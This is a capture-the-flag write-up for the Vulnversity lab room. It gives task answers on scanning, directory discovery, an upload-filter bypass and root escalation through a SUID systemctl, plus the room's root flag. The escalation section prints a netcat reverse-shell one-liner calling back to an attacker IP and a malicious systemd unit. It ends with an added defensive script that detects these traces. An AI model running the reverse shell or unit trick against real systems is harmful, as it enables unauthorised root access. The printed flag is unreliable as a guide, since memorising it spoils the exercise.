Vulnversity ⭐️ Reverse shell ⭐️ systemctl privilege escalation
task1 Deploy the machine
No answer needed
task2 Reconnaissance
1.There are many nmap “cheatsheets” online that you can use too.
No answer needed
2.Scan the box, how many ports are open?
6
3.What version of the squid proxy is running on the machine?
3.5.12
4.How many ports will nmap scan if the flag -p-400 was used?
400
5.Using the nmap flag -n what will it not resolve?
DNS
-n disables reverse DNS resolution
6.What is the most likely operating system this machine is running?
Ubuntu
7.What port is the web server running on?
3333
task3 Locating directories using GoBuster
1.What is the directory that has an upload form page?
/internal/
task4 Compromise the webserver
1.Try upload a few file types to the server, what common extension seems to be blocked?
.php
2.Run this attack, what extension is allowed?
.phtml
3.What is the name of the user who manages the webserver?
bill
4.What is the user flag?
task5 Privilege Escalation
1.On the system, search for all SUID files. What file stands out?
/bin/systemctl
find / -user root -perm -4000 -exec ls -ldb {} \;    lists every root-owned file on the system with the SUID bit set
/bin/systemctl has the SUID bit set and can be used for privilege escalation.
2.Its challenge time! We have guided you through this far, are you able to exploit this system further to escalate your privileges and get the final answer?
Become root and get the last flag (/root/root.txt)
a58ff8579f0a9270368d33a9966c7fd5
www-data@vulnuniversity:/tmp$ echo "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.9.23.70 7788 >/tmp/f" > /tmp/shell.sh
www-data@vulnuniversity:/tmp$ TF=$(mktemp).service
www-data@vulnuniversity:/tmp$ echo '[Service]
> Type=oneshot
> ExecStart=/bin/sh -c "bash /tmp/shell.sh"
> [Install]
> WantedBy=multi-user.target' > $TF
www-data@vulnuniversity:/tmp$ /bin/systemctl link $TF
Created symlink from /etc/systemd/system/tmp.CHTuvfkaoz.service to /tmp/tmp.CHTuvfkaoz.service.
www-data@vulnuniversity:/tmp$ /bin/systemctl enable --now $TF
Created symlink from /etc/systemd/system/multi-user.target.wants/tmp.CHTuvfkaoz.service to /tmp/tmp.CHTuvfkaoz.service.
Privilege escalation approach: /bin/systemctl runs with root privileges (SUID), so writing a new service unit and having systemctl load it executes an arbitrary script as root.
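From the defender's side, the technique above leaves two artifacts: a SUID copy of systemctl, and unit symlinks under /etc/systemd/system pointing into /tmp. The following audit script is an added example, not part of the original write-up; it assumes a POSIX shell with find(1) and readlink(1), and takes the directories to check as arguments so it can be run against a test tree.

```shell
#!/bin/sh
# Added detection example (not from the write-up above). Flags the traces
# that `systemctl link`/`systemctl enable` on a unit file created under /tmp
# leaves behind, and reports SUID binaries that appear on a watch list.

# Count systemd unit symlinks (top level and *.wants entries) under the given
# unit directory whose link target lives in a world-writable location.
# Prints the count; details go to stderr.
count_suspicious_units() {
    unit_dir="$1"
    count=0
    for link in "$unit_dir"/*.service "$unit_dir"/*.wants/*.service; do
        [ -L "$link" ] || continue
        target=$(readlink "$link")
        case "$target" in
            /tmp/*|/var/tmp/*|/dev/shm/*)
                printf 'suspicious unit: %s -> %s\n' "$link" "$target" >&2
                count=$((count + 1)) ;;
        esac
    done
    printf '%s\n' "$count"
}

# Constructed watch list: binaries that give a root shell when SUID.
# systemctl is the one abused in this room; extend the list as needed.
SUID_WATCHLIST="systemctl"

# Print the basenames of SUID files under the given root that match the
# watch list, one per line, de-duplicated.
suid_watchlist_hits() {
    root="$1"
    find "$root" -type f -perm -4000 2>/dev/null | while read -r f; do
        name=$(basename "$f")
        for w in $SUID_WATCHLIST; do
            if [ "$name" = "$w" ]; then
                printf '%s\n' "$name"
            fi
        done
    done | sort -u
}

# Real-system usage (assumed paths):
#   count_suspicious_units /etc/systemd/system
#   suid_watchlist_hits /
```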